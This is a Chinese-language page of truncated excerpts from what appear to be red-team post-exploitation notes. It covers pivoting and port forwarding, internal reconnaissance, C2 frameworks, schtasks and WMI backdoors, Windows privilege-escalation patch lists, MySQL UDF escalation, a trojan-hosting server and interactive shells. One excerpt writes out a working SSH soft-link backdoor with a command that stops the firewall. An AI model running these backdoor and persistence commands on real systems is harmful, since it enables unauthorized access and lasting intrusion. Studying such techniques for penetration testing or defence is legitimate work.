# 网络连通性测试 能出网的做反向代理，不能出网的做正向代理 是否存在Nginx反向代理 找到Nginx目录，查看配置文件 某次实战中发现正反向都代理不出去，查看配置文件发现了nginx反代，直接连接公网IP代理的3389 # 客户端代理工具 # 端口转发-高权限无工具 # Windows netsh 端口转发（双网卡用） netsh仅支持TCP协议， 适用于双网卡服务器 连接外网6666端口，就…

信息收集的深度，直接关系到内网渗透结果的成败 进入内网后，红队一般会在本机以及内部网络 开展进一步信息收集和情报刺探工作 包括收集当前计算机的网络连接、进程列表、命令执行历史记录、 数据库信息、当前用户信息、管理员登录信息、总结密码规律、补丁更新频率等信息； 同时对内网的其他机器的IP、主机名、开放端口服务等情况进行情报刺探。 再利用内网机器不及时修复漏洞、不做安全防护、同口令等弱点来进行横向渗透…

# 概述 先说下我们常常听大佬们说的C2和C&C，其实就是远控（Command&Control 命令执行和控制） 而权限维持中我们常用的C2工具就是 CobaltStrike和MSF这些，优点是功能强大； 有很多后渗透利用的功能很方便，缺点就是树大招风特征被各大杀软分析，免杀费劲。 目标防护较弱或者免杀能力强的师傅们可以忽略，其他人可以自己找冷门 开源的C2自己改。 其实权限维持中…

# Schtasks后门 Schtasks.exe能够在本地或远程计算机上创建，删除，查询，更改，运行和结束计划任务 不带参数运行Schtasks.exe会显示每个已注册任务的状态和下一次运行时间。 # wmi后门 WMI后门使用了WMI的两个特征：无文件和无进程（需要管理员权限运行） 原理是将代码加密存储于WMI中，即无文件；调用PowerShell执行后门程序，执行后进程消失，即无进程。 在E…

# SSH软连接后门 #建立sshd的软连接 ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=12345 systemctl stop firewalld #连接目标，密码随便输入即可 ssh root@212.1×9.2xx.xx7 -p12345 #删除后门 rm -rf /tmp/su # 增加超级用户账号 如果系统不允许uid=0的用户（root）…

漏洞代号 补丁编号 适用平台 用途 MS14-058 KB3000061 03/08/12/Win7 本地提权 MS15-051 KB3057191 03/08/12/Win7 本地提权 MS16-032 KB3143141 08/12/Win7 本地提权 MS16-135 KB3198234 08/12/16/Win7/Win10 本地提权 MS16-016 KB3135173 08/Win7 …

# MySQL数据库 # UDF提权 UDF提权原理 UDF(user-defined function)是MySQL的一个拓展接口，也可称之为用户自定义函数 用户可以通过自己增加函数对mysql功能进行扩充，文件后缀为.dll 利用root权限，创建带有调用cmd函数的’udf.dll’(动态链接库) 当我们把’udf.dll’导出指定文件夹引入Mysql时，其中的调用函数拿出来当作mysql的…

# 搭建用于下载木马的服务器 # Nginx curl -o /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.repo curl -o /etc/yum.repos.d/epel.repo http://mirrors.cloud.tencent.com/repo/epel-7.repo yum …

# 交互式Shell su root被禁止登录（获取交互shell） 拿到 root 密码，端口转发，代理，但防火墙禁止其他人登录 root； 用原来的低权限 shell，也无法 sudo 切换 root 提示 因为出于安全考虑，linux 要求用户必须从终端设备（tty）中输入密码，而不是标准输入（stdin） 所以 sudo 在你输入密码的时候本质上是读取了键盘，而不是读取 bash 里面输入…

# 信息收集思维导图 提示 思维导图中的链接不要直接点击，请右键在新标签页打开